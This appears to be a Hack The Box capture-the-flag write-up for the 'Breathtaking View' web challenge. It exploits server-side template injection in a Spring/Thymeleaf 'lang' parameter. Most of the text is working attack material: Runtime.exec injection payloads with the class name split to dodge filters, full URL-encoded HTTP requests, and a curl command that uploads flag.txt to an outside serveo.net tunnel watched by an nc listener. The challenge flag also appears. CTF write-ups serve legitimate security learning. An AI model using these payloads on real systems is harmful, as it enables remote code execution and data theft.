🎑Breathtaking View

https://app.hackthebox.com/challenges/Breathtaking%2520View

Lang Parameter SSTI

URL Encoding on lang prameter after registering a user

GET /?lang=%5F%5F%24%7B7%2A7%7D%5F%5F%3A%3A%2Ex HTTP/1.1
Host: 83.136.254.158:47663
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.254.158:47663/?lang=fr
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=45E2BD7F8A86B36CAED250407C7B7A19
Connection: keep-alive

...
Error resolving template [49]
...

A little tweaking the command and we can install curl

__*{"".getClass().forName('j'+'av'+'a.lang.Runtime').getRuntime().exec("apt update")}__::.x

__*{"".getClass().forName('j'+'av'+'a.lang.Runtime').getRuntime().exec("apt install -y curl")}__::.x

All Command needed to be URL-Encoded use Burp-Suite for this. The full commmand would look like this:

GET /?lang=%5f%5f%2a%7b%22%22%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%27%2b%27%61%76%27%2b%27%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%27%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%61%70%74%20%69%6e%73%74%61%6c%6c%20%2d%79%20%63%75%72%6c%22%29%7d%5f%5f%3a%3a%2e%78 HTTP/1.1
Host: 83.136.254.158:47663
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.254.158:47663/?lang=fr
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=45E2BD7F8A86B36CAED250407C7B7A19
Connection: keep-alive

Exposing IP using serveo

 ssh -R 80:localhost:1234 serveo.net 
 Forwarding HTTP traffic from https://97691d4196b64b230baff59ed2f57493.serveo.net

Listener

 nc -nlvp 1234
 ....
 
 Response after curl 
 ....
 
 listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43876
PUT /flag.txt HTTP/1.1
Host: 97691d4196b64b230baff59ed2f57493.serveo.net
User-Agent: curl/7.74.0
Content-Length: 21
Accept: */*
X-Forwarded-For: 83.136.254.158
X-Forwarded-Host: 97691d4196b64b230baff59ed2f57493.serveo.net
X-Forwarded-Proto: https
Accept-Encoding: gzip

HTB{whAt_4_v1ewWwww!}%

Payload

__*{"".getClass().forName('j'+'av'+'a.lang.Runtime').getRuntime().exec("curl https://97691d4196b64b230baff59ed2f57493.serveo.net -T flag.txt")}__::.x

Payload URL-Encoded

%5f%5f%2a%7b%22%22%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%27%2b%27%61%76%27%2b%27%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%27%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%75%72%6c%20%68%74%74%70%73%3a%2f%2f%39%37%36%39%31%64%34%31%39%36%62%36%34%62%32%33%30%62%61%66%66%35%39%65%64%32%66%35%37%34%39%33%2e%73%65%72%76%65%6f%2e%6e%65%74%20%2d%54%20%66%6c%61%67%2e%74%78%74%22%29%7d%5f%5f%3a%3a%2e%78

Request

GET /?lang=%5f%5f%2a%7b%22%22%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%27%2b%27%61%76%27%2b%27%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%27%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%75%72%6c%20%68%74%74%70%73%3a%2f%2f%39%37%36%39%31%64%34%31%39%36%62%36%34%62%32%33%30%62%61%66%66%35%39%65%64%32%66%35%37%34%39%33%2e%73%65%72%76%65%6f%2e%6e%65%74%20%2d%54%20%66%6c%61%67%2e%74%78%74%22%29%7d%5f%5f%3a%3a%2e%78 HTTP/1.1
Host: 83.136.254.158:47663
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.254.158:47663/?lang=fr
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=45E2BD7F8A86B36CAED250407C7B7A19
Connection: keep-alive

Response

HTTP/1.1 500 
Content-Type: text/html;charset=UTF-8
Content-Language: de-DE
Content-Length: 451
Date: Fri, 11 Oct 2024 21:18:45 GMT
Connection: close

<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Fri Oct 11 21:18:45 UTC 2024</div><div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>Error resolving template [java.lang.UNIXProcess@3672d41], template might not exist or might not be accessible by any of the configured Template Resolvers</div></body></html>

Last updated 1 year ago